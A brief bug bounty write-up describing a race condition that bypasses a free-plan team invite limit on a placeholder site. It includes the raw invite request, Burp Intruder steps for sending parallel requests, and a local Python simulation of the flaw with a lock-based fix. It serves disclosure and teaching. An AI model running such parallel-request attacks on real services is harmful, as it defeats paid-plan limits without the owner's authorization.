Race Condition bypassing team limit

Arbaz Hussain
Jul 20, 2017 · 1 min read

Severity: Medium

Complexity: Easy

Weakness: Race condition


  • The application under test has functionality to create a team and invite users to the team.
  • There is a free limit of 5 invited users per team. If you want to invite more users, they ask you to upgrade your plan to Pro.
  • Request sent while adding a member to our team:

POST /account/work/team/ HTTP/1.1
Host: www.site.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/javascript, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Referer: https://www.site.com/home/work/team/manage
Content-Length: 108
Cookie: <REDACTED>
Connection: close

emails=xxxxxxx@gmail.com&team=name&authenticity_token=<>

  • Send the request to Burp Intruder, adding an email list to the emails= parameter.
  • Set the minimum thread speed (10–15) and start the attack.
  • Result:
Bypassed the limit to 22
  • Increasing threading to ~10 sends 10 requests at the same time. This triggers a race condition in the limit check, which bypassed their team limit.
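
A server-side sketch of how a check-then-insert limit can be bypassed this way, beside a hardened form. This is an added example, not code from the original post or the tested application: the Team class, the handler names and the example.test addresses are assumptions, and a barrier stands in for the gap between the count check and the write so the interleaving is reproducible.

```python
import threading

FREE_LIMIT = 5  # free-plan invite limit described in the write-up


class Team:
    """Hypothetical in-memory stand-in for the team membership table."""
    def __init__(self):
        self.members = []
        self.lock = threading.Lock()


def invite_vulnerable(team, email, arrive):
    # Check and write are separate steps with no lock between them.
    if len(team.members) >= FREE_LIMIT:
        return False
    arrive.wait()  # constructed gap: every request has passed the check by now
    team.members.append(email)
    return True


def invite_hardened(team, email, arrive):
    arrive.wait()  # all requests still arrive at the same moment
    with team.lock:  # check and write form one critical section
        if len(team.members) >= FREE_LIMIT:
            return False
        team.members.append(email)
        return True


def run_concurrently(handler, n=10):
    """Fire n simultaneous invites at a fresh team; return the member count."""
    team = Team()
    arrive = threading.Barrier(n)
    threads = [
        threading.Thread(target=handler,
                         args=(team, f"user{i}@example.test", arrive))
        for i in range(n)
    ]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return len(team.members)


if __name__ == "__main__":
    print("vulnerable:", run_concurrently(invite_vulnerable))  # 10
    print("hardened:", run_concurrently(invite_hardened))      # 5
```

In a database-backed application the equivalent fix is to make the count and the insert one atomic operation, for example a row lock on the team inside the transaction or a conditional insert.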
